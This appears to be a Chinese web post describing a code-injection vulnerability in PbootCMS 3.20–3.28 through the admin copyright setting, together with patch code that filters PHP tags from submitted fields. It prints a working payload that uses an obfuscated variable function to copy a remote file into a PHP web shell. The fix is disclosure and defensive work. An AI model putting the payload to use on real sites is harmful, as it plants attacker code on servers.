漏洞原理
通过后台设置设置开启缓存 在版权设置添加
<?php
$test=”copy”;
$test(“http://IP:80/1.txt”,”test.php”);
?>
会执行copy 在程序目录复制一份text.php的文件,文件的内容是 http://IP:80/1.txt 这个的内容
修复方法 将 apps\admin\controller\content
目录下的 SiteController.php加一个判断
// 修改站点信息
public function mod()
{
if (! $_POST) {
return;
}
// 安全过滤:移除所有字段中的PHP标签
$cleanData = [];
foreach ($_POST as $key => $value) {
// 增强型标签过滤(支持多标签检测)
if (is_string($value) && preg_match('/(<\?(php|=|[^a-z]|%))/i', $value)) {
// 检测具体标签类型
$detected_tags = [];
if (preg_match('/<\?php/i', $value)) $detected_tags[] = 'PHP标准标签';
if (preg_match('/<\?=|\bphp\b/i', $value)) $detected_tags[] = '短标签';
if (preg_match('/<%|%>/', $value)) $detected_tags[] = 'ASP风格标签';
// 构建错误提示
$error_msg = '提交内容包含非法代码标签已经记录IP:' . implode('、', $detected_tags);
error($error_msg);
}
// 保留原始处理逻辑(建议后续添加更多清理措施)
$cleanData[$key] = $value;
}有问题可以加入技术QQ群一起交流学习
本站vip会员 请加入无忧模板网 VIP群(50604020) PS:加入时备注用户名或昵称
普通注册会员或访客 请加入无忧模板网 技术交流群(50604130)
客服微信号:15898888535
pbootcms模板网 » PBOOTCMS 3.20 3.24 3.25 3.28通杀漏洞修复代码
本站vip会员 请加入无忧模板网 VIP群(50604020) PS:加入时备注用户名或昵称
普通注册会员或访客 请加入无忧模板网 技术交流群(50604130)
客服微信号:15898888535
pbootcms模板网 » PBOOTCMS 3.20 3.24 3.25 3.28通杀漏洞修复代码
